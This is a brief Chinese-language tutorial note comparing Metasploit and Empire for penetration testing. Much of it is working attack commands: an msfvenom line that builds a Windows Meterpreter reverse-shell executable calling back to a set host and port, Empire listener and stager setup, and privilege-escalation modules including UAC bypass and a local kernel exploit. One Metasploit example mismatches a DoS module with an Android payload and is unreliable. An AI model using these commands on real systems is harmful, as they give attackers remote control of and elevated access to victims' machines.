msf和empire的使用区别
msf需要先生成木马,在进行监听(需要保证payload一致)
empire需要先监听,在生成木马,
监听的区别
设置payload
设置主机ip,端口等
empire:
listeners(显示所有的监听种类)
use listener http(使用监听种类)
set host (设置主机ip)
set port (设置主机端口号)
需要设置name:set name tianxia
execute(执行)
msf
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids(模块)
set payload android/meterpreter/reverse_tcp
set host (设置主机ip)
set port (设置主机端口号)
run(exploit)执行
建立木马的区别
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=5555 -f exe > shell.exe
即可生成exe文件
-p选择自己的payload
LHOST设置主机
LPORT端口
-f 生成文件类型
empire
usestager展示所有的载荷
看每一个payload的后缀,生成自己需要的文件类型
以windows/launcher_bat为例
usestager windows/launcher_bat
set Listener tianxia
即可生成文件
提权
执行命令
查找系统中的漏洞,usemodule privesc/powerup/allchecks该模块可以执行所有脚本检查系统漏洞,
usemodule privesc/powerup/allchecks
set name tianxia
execute
根据回显选择对应载荷进行攻击
empire:与cs类似,执行系统命令时需要加shell 例如,shell whomi
usemodule 空格加两下 tab 查看全部模块
usemodule privesc/bypassuac
set name tianxia
execute 执行即可
msf
需要上传Windows-Exploit-Suggester脚本进行检测,在目标上执行此文件通过回显,选择对应payload
use exploit/windows/local/ms16_016_webdav
set session 1
run即可
empire以name传递
msf以seesion编号传递
横向渗透方面
都是需要使用对应payload进行攻击
不同的是empire使用name作为传递对象
msf使用session作为传递对象
个人看法
empire相对于msf来说,功能没有太大区别,类似于cobalt strike但又缺乏cs的图形化界面
具体empire使用方法参照
https://blog.csdn.net/Appleteachers/article/details/116453132
msf的参照
https://www.jianshu.com/p/32474b6bbf00